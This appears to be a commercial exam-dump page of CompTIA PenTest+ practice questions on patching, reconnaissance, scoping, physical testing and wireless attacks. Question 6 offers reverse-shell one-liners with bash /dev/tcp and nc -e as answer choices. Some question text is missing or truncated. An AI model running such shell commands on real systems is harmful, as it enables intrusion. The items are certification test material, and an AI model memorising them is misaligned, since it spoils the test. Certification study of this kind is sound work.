New Year Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-002 Questions and answers with CertsForce

Viewing page 1 out of 14 pages
Viewing questions 1-10 out of questions
Questions # 1:

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

Options:

A.

Implementation of patching and change control programs


B.

Revision of client scripts used to perform system updates


C.

Remedial training for the client's systems administrators


D.

Refrainment from patching systems until quality assurance approves


Expert Solution
Questions # 2:
Options:

A.

Burp Suite


B.

Nessus


C.

Nikto


D.

SQLmap


Expert Solution
Questions # 3:

In Java and C/C++, variable initialization is critical because:

Options:

A.

the unknown value, when used later, will cause unexpected behavior.


B.

the compiler will assign null to the variable, which will cause warnings and errors.


C.

the initial state of the variable creates a race condition.


D.

the variable will not have an object type assigned to it.


Expert Solution
Questions # 4:

Which of the following describes how a penetration tester could prioritize findings in a report?

Options:

A.

Business mission and goals


B.

Cyberassets


C.

Network infrastructure


D.

Cyberthreats


Expert Solution
Questions # 5:

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Options:

A.

Bluejacking


B.

Bluesnarfing


C.

BLE attack


D.

WPS PIN attack


Expert Solution
Questions # 6:

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

Options:

A.

bash -i >& /dev/tcp 8443 0>&l


B.

nc -e host 8443 /bin/bash


C.

nc -vlp 8443 /bin/bash


D.

nc -vp 8443 /bin/bash


Expert Solution
Questions # 7:

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

Options:

A.

nmap –f –sV –p80 192.168.1.20


B.

nmap –sS –sL –p80 192.168.1.20


C.

nmap –A –T4 –p80 192.168.1.20


D.

nmap –O –v –p80 192.168.1.20


Expert Solution
Questions # 8:

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Options:

A.

Utilize the tunnel as a means of pivoting to other internal devices.


B.

Disregard the IP range, as it is out of scope.


C.

Stop the assessment and inform the emergency contact.


D.

Scan the IP range for additional systems to exploit.


Expert Solution
Questions # 9:

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

Options:

A.

Wardriving


B.

Shodan


C.

Recon-ng


D.

Aircrack-ng


Expert Solution
Questions # 10:

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

Options:

A.

Attempting to tailgate an employee going into the client's workplace


B.

Dropping a malicious USB key with the company’s logo in the parking lot


C.

Using a brute-force attack against the external perimeter to gain a foothold


D.

Performing spear phishing against employees by posing as senior management


Expert Solution
Viewing page 1 out of 14 pages
Viewing questions 1-10 out of questions